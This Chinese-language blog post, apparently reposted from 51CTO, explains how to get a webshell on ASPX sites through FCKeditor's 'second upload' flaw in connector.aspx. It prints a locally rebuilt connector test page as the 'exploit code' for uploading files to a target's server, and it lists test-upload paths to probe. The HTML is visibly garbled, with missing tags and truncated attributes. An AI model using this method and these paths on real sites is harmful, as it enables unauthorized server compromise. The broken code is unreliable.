FCKeditor无test上传页面二次上传-白红宇

本文由EnjoyHack原创或转载，转载时请注明出处，详细出处请参考：

FCKeditor二次上传拿shell算是FCKeditor漏洞集中比较经典的了，这个二次上传前提条件是要支持aspx而且要求FckEditor/editor/filemanager/connectors/aspx/connector.aspx文件为删除。二次上传漏洞对ASPX站点来说利用比较方便，成功率也比较高，当然若是ASP的站点，支持ASPX和文件为删的情况下也是没问题的。

在利用二次上传过程中我们往往都是找到FckEditor中的一些test上传页面来进行上传，不过也有遇到test上传页面全部被删除的情况，之前我便遇见过许多，不过在遇到test上传页面被删除的情况下我们可以本地构造上传页谈后提交，前提要确认FckEditor/editor/filemanager/connectors/aspx/connector.aspx文件存在，并且服务器支持ASPX的解析。

利用代码：

<!--

* FCKeditor - The text editor for Internet -

* == BEGIN LICENSE ==

* Licensed under the terms of any of the following licenses at your

* choice:

* - GNU General Public License Version 2 or later (the "GPL")

* - GNU Lesser General Public License Version 2.1 or later (the "LGPL")

* - Mozilla Public License Version 1.1 or later (the "MPL")

* == END LICENSE ==

* Test page for the File Browser connectors.

-->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html xmlns="

<head>

<title>FCKeditor - Connectors Tests</title>

function BuildBaseUrl( command )

{

var sUrl =

document.getElementById('cmbConnector').value +

'?Command=' + command +

'&Type=' + document.getElementById('cmbType').value +

'&CurrentFolder=' + encodeURIComponent(document.getElementById('txtFolder').value) ;

return sUrl ;

}

function SetFrameUrl( url )

{

document.getElementById('eRunningFrame').src = url ;

document.getElementById('eUrl').innerHTML = url ;

}

function GetFolders()

{

SetFrameUrl( BuildBaseUrl( 'GetFolders' ) ) ;

return false ;

}

function GetFoldersAndFiles()

{

SetFrameUrl( BuildBaseUrl( 'GetFoldersAndFiles' ) ) ;

return false ;

}

function CreateFolder()

{

var sFolder = prompt( 'Type the folder name:', 'Test Folder' ) ;

if ( ! sFolder )

return false ;

var sUrl = BuildBaseUrl( 'CreateFolder' ) ;

sUrl += '&NewFolderName=' + encodeURIComponent( sFolder ) ;

SetFrameUrl( sUrl ) ;

return false ;

}

function OnUploadCompleted( errorNumber, fileName )

{

switch ( errorNumber )

{

case 0 :

alert( 'File uploaded with no errors' ) ;

break ;

case 201 :

GetFoldersAndFiles() ;

alert( 'A file with the same name is already available. The uploaded file has been renamed to "' + fileName + '"' ) ;

break ;

case 202 :

alert( 'Invalid file' ) ;

break ;

default :

alert( 'Error on file upload. Error number: ' + errorNumber ) ;

break ;

}

this.frames.frmUpload = this ;

function SetAction()

{

var sUrl = BuildBaseUrl( 'FileUpload' ) ;

document.getElementById('eUrl').innerHTML = sUrl ;

document.getElementById('frmUpload').action = sUrl ;

}

</script>

</head>

<body>

<tr>

<td>

<tr>

<td>

Connector:<br />

<option value="

<option value="cfm/connector.cfm">ColdFusion</option>

<option value="lasso/connector.lasso">Lasso</option>

<option value="py/connector.py">Python</option>

</select>

</td>

<td>

</td>

<td>

Current Folder<br />

<td>

</td>

<td>

Resource Type<br />

<option value="Image">Image</option>

<option value="Flash">Flash</option>

<option value="Media">Media</option>

<option value="Invalid">Invalid Type (for testing)</option>

</select>

</td>

</tr>

</table>

<br />

<tr>

<td>

</td>

<td>

</td>

<td>

</td>

File Upload<br />

</form>

</td>

</tr>

</table>

<br />

URL: <span id="eUrl"></span>

</td>

</tr>

<tr>

height="100%"></iframe>

</td>

</tr>

</table>

</body>

</html>

<option value="

>既是ASXP的上传执行路径，asp和php的也同理，需要时请自行补充！！

FCKeditor 中test 文件的上传地址

FCKeditor/editor/filemanager/browser/default/connectors/test.html

FCKeditor/editor/filemanager/upload/test.html

FCKeditor/editor/filemanager/connectors/test.html

FCKeditor/editor/filemanager/connectors/uploadtest.html

本文转hackfreer51CTO博客，原文链接：http://blog.51cto.com/pnig0s1992/458345，如需转载请自行联系原作者